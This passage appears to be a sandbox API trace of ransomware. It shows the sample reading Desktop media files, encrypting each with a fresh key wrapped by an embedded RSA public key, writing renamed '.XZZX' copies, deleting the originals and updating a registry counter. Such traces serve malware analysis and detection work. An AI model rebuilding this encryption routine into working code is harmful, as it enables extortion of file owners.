VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.494] CloseHandle (hObject=0x9a4) returned 1 [0168.494] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0168.494] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0168.494] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_av9Cb6IPXGAa5C.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_av9cb6ipxgaa5c.mp4")) returned 1 [0168.495] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_av9Cb6IPXGAa5C.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_av9cb6ipxgaa5c.mp4")) returned 0 Thread: id = 572 os_tid = 0x6f4 [0168.553] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.553] lstrcpyW (in: lpString1=0x29af460, lpString2="4BTbVX2SL5PMNXlhJi.m4a" | out: lpString1="4BTbVX2SL5PMNXlhJi.m4a") returned="4BTbVX2SL5PMNXlhJi.m4a" [0168.553] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.553] SetErrorMode (uMode=0x1) returned 0x1 [0168.553] lstrcpyW (in: lpString1=0x29af860, lpString2="4BTbVX2SL5PMNXlhJi.m4a" | out: lpString1="4BTbVX2SL5PMNXlhJi.m4a") returned="4BTbVX2SL5PMNXlhJi.m4a" [0168.553] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x3d2848df, Data2=0x2db9, Data3=0x4eed, Data4=([0]=0xb3, [1]=0x68, [2]=0xa, [3]=0xe0, [4]=0x5, [5]=0x27, [6]=0x99, [7]=0xfd))) returned 0x0 [0168.553] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\4BTbVX2SL5PMNXlhJi.m4a") returned 84 [0168.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0168.553] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\46EBDC270E18B2453D2848DF10B3968D.XZZX") returned 99 [0168.553] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="XZZX") returned 0x0 [0168.553] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\4BTbVX2SL5PMNXlhJi.m4a", dwFileAttributes=0x20) returned 1 [0168.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\4BTbVX2SL5PMNXlhJi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\4btbvx2sl5pmnxlhji.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9ac [0168.554] ReadFile (in: hFile=0x9ac, lpBuffer=0x43ac728, nNumberOfBytesToRead=0x6b2c, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesRead=0x29ae418*=0x6b2c, lpOverlapped=0x0) returned 1 [0168.555] CloseHandle (hObject=0x9ac) returned 1 [0168.555] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0168.555] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0168.555] SetErrorMode (uMode=0x1) returned 0x1 [0168.555] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0168.556] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a4e10) returned 1 [0168.558] CryptGenKey (in: hProv=0x43a4e10, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0168.659] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.659] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.659] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.659] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0168.659] CryptDestroyKey (hKey=0x4372978) returned 1 [0168.659] CryptReleaseContext (hProv=0x43a4e10, dwFlags=0x0) returned 1 [0168.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\46EBDC270E18B2453D2848DF10B3968D.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\46ebdc270e18b2453d2848df10b3968d.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9ac [0168.660] WriteFile (in: hFile=0x9ac, lpBuffer=0x43ac728*, nNumberOfBytesToWrite=0x6b2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43ac728*, lpNumberOfBytesWritten=0x29ae438*=0x6b2c, lpOverlapped=0x0) returned 1 [0168.660] SetFilePointer (in: hFile=0x9ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b2c [0168.660] WriteFile (in: hFile=0x9ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.660] SetFilePointer (in: hFile=0x9ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b31 [0168.660] WriteFile (in: hFile=0x9ac, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2c, lpOverlapped=0x0) returned 1 [0168.661] SetFilePointer (in: hFile=0x9ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b5d [0168.661] WriteFile (in: hFile=0x9ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.661] SetFilePointer (in: hFile=0x9ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6b62 [0168.661] SetErrorMode (uMode=0x1) returned 0x1 [0168.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0168.661] OutputDebugStringW (lpOutputString="end") [0168.661] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.661] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0168.661] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a4e10) returned 1 [0168.662] CryptImportPublicKeyInfo (in: hCryptProv=0x43a4e10, dwCertEncodingType=0x1, pInfo=0x437f708*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f738*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f740*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372d78) returned 1 [0168.662] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.662] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0168.662] CryptEncrypt (in: hKey=0x4372d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0168.662] CryptEncrypt (in: hKey=0x4372d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a4e98*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a4e98*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0168.662] WriteFile (in: hFile=0x9ac, lpBuffer=0x43a4e98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a4e98*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0168.662] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0168.662] WriteFile (in: hFile=0x9ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.662] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0168.663] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0168.663] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9b8) returned 0x0 [0168.663] RegQueryValueExW (in: hKey=0x9b8, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xf7, lpcbData=0x29adfdc*=0x4) returned 0x0 [0168.663] RegCloseKey (hKey=0x9b8) returned 0x0 [0168.663] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9b8) returned 0x0 [0168.663] RegSetValueExW (in: hKey=0x9b8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xf8, cbData=0x4 | out: lpData=0x29adfec*=0xf8) returned 0x0 [0168.663] RegCloseKey (hKey=0x9b8) returned 0x0 [0168.663] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.663] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.663] CloseHandle (hObject=0x9ac) returned 1 [0168.664] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0168.664] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0168.664] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\4BTbVX2SL5PMNXlhJi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\4btbvx2sl5pmnxlhji.m4a")) returned 1 [0168.665] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\4BTbVX2SL5PMNXlhJi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\4btbvx2sl5pmnxlhji.m4a")) returned 0 Thread: id = 573 os_tid = 0x588 [0168.705] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0168.705] lstrcpyW (in: lpString1=0x29af460, lpString2="BOrtQ-gODoJ96Mp2i.pps" | out: lpString1="BOrtQ-gODoJ96Mp2i.pps") returned="BOrtQ-gODoJ96Mp2i.pps" [0168.705] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0168.705] SetErrorMode (uMode=0x1) returned 0x1 [0168.705] lstrcpyW (in: lpString1=0x29af860, lpString2="BOrtQ-gODoJ96Mp2i.pps" | out: lpString1="BOrtQ-gODoJ96Mp2i.pps") returned="BOrtQ-gODoJ96Mp2i.pps" [0168.705] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xf9cf7385, Data2=0xad1c, Data3=0x4496, Data4=([0]=0xa3, [1]=0x6e, [2]=0x10, [3]=0xa4, [4]=0x89, [5]=0x8c, [6]=0x36, [7]=0x74))) returned 0x0 [0168.705] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\BOrtQ-gODoJ96Mp2i.pps") returned 83 [0168.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0168.706] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\83C1838C2E60DE68F9CF738530FBC2B0.XZZX") returned 99 [0168.706] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="XZZX") returned 0x0 [0168.706] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\BOrtQ-gODoJ96Mp2i.pps", dwFileAttributes=0x20) returned 1 [0168.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\BOrtQ-gODoJ96Mp2i.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\bortq-godoj96mp2i.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b4 [0168.707] ReadFile (in: hFile=0x9b4, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xfd6f, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xfd6f, lpOverlapped=0x0) returned 1 [0168.708] CloseHandle (hObject=0x9b4) returned 1 [0168.709] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0168.709] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0168.709] SetErrorMode (uMode=0x1) returned 0x1 [0168.709] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0168.709] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a4f20) returned 1 [0168.712] CryptGenKey (in: hProv=0x43a4f20, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0168.823] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.823] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0168.823] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.824] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0168.824] CryptDestroyKey (hKey=0x4372978) returned 1 [0168.824] CryptReleaseContext (hProv=0x43a4f20, dwFlags=0x0) returned 1 [0168.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\83C1838C2E60DE68F9CF738530FBC2B0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\83c1838c2e60de68f9cf738530fbc2b0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9b4 [0168.824] WriteFile (in: hFile=0x9b4, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xfd6f, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xfd6f, lpOverlapped=0x0) returned 1 [0168.825] SetFilePointer (in: hFile=0x9b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfd6f [0168.825] WriteFile (in: hFile=0x9b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.825] SetFilePointer (in: hFile=0x9b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfd74 [0168.825] WriteFile (in: hFile=0x9b4, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2a, lpOverlapped=0x0) returned 1 [0168.826] SetFilePointer (in: hFile=0x9b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfd9e [0168.826] WriteFile (in: hFile=0x9b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0168.826] SetFilePointer (in: hFile=0x9b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfda3 [0168.826] SetErrorMode (uMode=0x1) returned 0x1 [0168.826] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0168.826] OutputDebugStringW (lpOutputString="end") [0168.826] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0168.826] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0168.826] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a4f20) returned 1 [0168.826] CryptImportPublicKeyInfo (in: hCryptProv=0x43a4f20, dwCertEncodingType=0x1, pInfo=0x437f7d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437f808*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437f810*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372db8) returned 1 [0168.826] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0168.827] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0168.827] CryptEncrypt (in: hKey=0x4372db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0168.827] CryptEncrypt (in: hKey=0x4372db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a4fa8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a4fa8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0168.827] WriteFile (in: hFile=0x9b4, lpBuffer=0x43a4fa8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a4fa8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0168.827] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0168.827] WriteFile (in: hFile=0x9b4, 